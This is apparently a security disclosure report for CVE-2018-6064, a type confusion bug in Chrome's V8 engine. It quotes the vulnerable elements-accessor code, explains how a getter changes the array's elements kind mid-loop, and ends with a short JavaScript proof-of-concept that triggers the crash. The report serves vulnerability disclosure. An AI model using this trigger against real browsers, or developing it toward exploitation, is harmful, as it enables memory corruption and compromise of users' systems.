Chrome: V8: Type confusion in ElementsAccessorBase::CollectValuesOrEntriesImpl

CVE-2018-6064

Here's a snippet of the method.
https://cs.chromium.org/chromium/src/v8/src/elements.cc?rcl=3cbf26e8a21aa76703d2c3c51adb9c96119500da&l=1051

  static Maybe<bool> CollectValuesOrEntriesImpl(
      Isolate* isolate, Handle<JSObject> object,
      Handle<FixedArray> values_or_entries, bool get_entries, int* nof_items,
      PropertyFilter filter) {
    ...
    for (int i = 0; i < keys->length(); ++i) {
      Handle<Object> key(keys->get(i), isolate);
      Handle<Object> value;
      uint32_t index;
      if (!key->ToUint32(&index)) continue;

      uint32_t entry = Subclass::GetEntryForIndexImpl(
          isolate, *object, object->elements(), index, filter);
      if (entry == kMaxUInt32) continue;

      PropertyDetails details = Subclass::GetDetailsImpl(*object, entry);

      if (details.kind() == kData) {
        value = Subclass::GetImpl(isolate, object->elements(), entry);
      } else {
        LookupIterator it(isolate, object, index, LookupIterator::OWN);
        ASSIGN_RETURN_ON_EXCEPTION_VALUE(
            isolate, value, Object::GetProperty(&it), Nothing<bool>());   <<------- (a)
      }

      if (get_entries) {
        value = MakeEntryPair(isolate, index, value);
      }

      values_or_entries->set(count++, *value);
    }

    *nof_items = count;
    return Just(true);
  }

At (a), the elements kind can be changed by getters: Object::GetProperty runs user JavaScript, while Subclass — the accessor chosen for the elements kind the array had when the loop started — is used again on the next iteration. This will lead to type confusion in GetEntryForIndexImpl, which then interprets object->elements() as if it still had the original kind. Any fix has to re-validate the elements kind (or re-dispatch to the matching accessor) after user code can run at (a).

PoC:

let arr = [];
arr[1000] = 0x1234;
arr.__defineGetter__(256, function () {
  delete arr[256];
  arr.unshift(1.1);
  arr.length = 0;
});
Object.entries(arr).toString();

This bug is subject to a 90-day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.

Found by: lokihardt